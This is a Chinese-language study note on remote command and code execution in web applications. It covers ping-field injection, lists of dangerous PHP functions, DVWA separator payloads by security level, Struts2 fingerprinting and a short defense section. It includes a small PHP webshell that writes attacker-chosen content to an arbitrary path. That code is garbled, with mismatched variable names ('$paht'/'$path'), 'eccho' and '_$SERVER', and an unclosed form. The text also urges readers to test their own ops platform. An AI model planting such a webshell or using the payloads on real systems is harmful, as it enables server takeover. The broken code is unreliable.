# 命令执行

一、远程代码执行

1. 远程系统命令执行  
一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口，比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。 而如果设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器 。  
现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。 在这种平台上往往会出现远程系统命令执行的漏洞,不信的话现在就可以找你们运维部的系统测试一下,会有意想不到的"收获"  

2. 远程代码执行  
同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。
因此，如果需要给前端用户提供操作类的API接口，一定需要对接口输入的内容进行严格的判断，比如实施严格的白名单策略会是一个比较好的方法。
你可以通过“RCE”对应的测试栏目，来进一步的了解该漏洞。

3. 实战测试,粗黑字体表示经常使用的  
- 执行系统命令: **assert,system**,passthru,**exec,shell_exec,**popen,proc_open,pcntl_exec,**\`\`(反单引号）**
- 代码执行与加密: **eval, assert,** call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
- 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
- .htaccess: SetHandler, auto_prepend_file, auto_append_file
- dvwa low &&   Medium & 或&;&    High | （代码里面的|后有一个空格）  
Impossible级别的代码加入了Anti-CSRF token，同时对参数ip进行了严格的限制，只有诸如“数字.数字.数字.数字”的输入才会被接收执行，因此不存在命令注入漏洞。

### 小马的代码示例,可以看到利用的是fopen,fwrite,fclose,DOCUMENT_ROOT 4个函数
### 木马执行必须是依赖网站的根目录,因为他是利用中间件进行远程操控
```
<?
$paht = $_POST["X"];
$text = $_POST["y"];
$file = fopen($path,"w+");
fwrite($file,$text);
fclose($file);

?>
<form action="" method = "post">
读取当前文件路径
<?eccho $_SERVER["DOCUMENT_ROOT"]._$SERVER["PHP_SELF"];?></br>
保存路径:<input name = "x" type ="text"/><br>
写入内容:<br><textarea name = "y" cols = "90" row = "50"></textarea></br>

```

# STRUCTS2框架的命令执行漏洞
- STRUCTS2框架的后缀是.action或者.do,可以拿来判断是否是这个框架的网站

二、防御方法
- 如果代码功能单一,把功能写死,比如用来测试延迟的,就把ping后面的ip地址写死,就只能填写数字类型 isnumberic()判断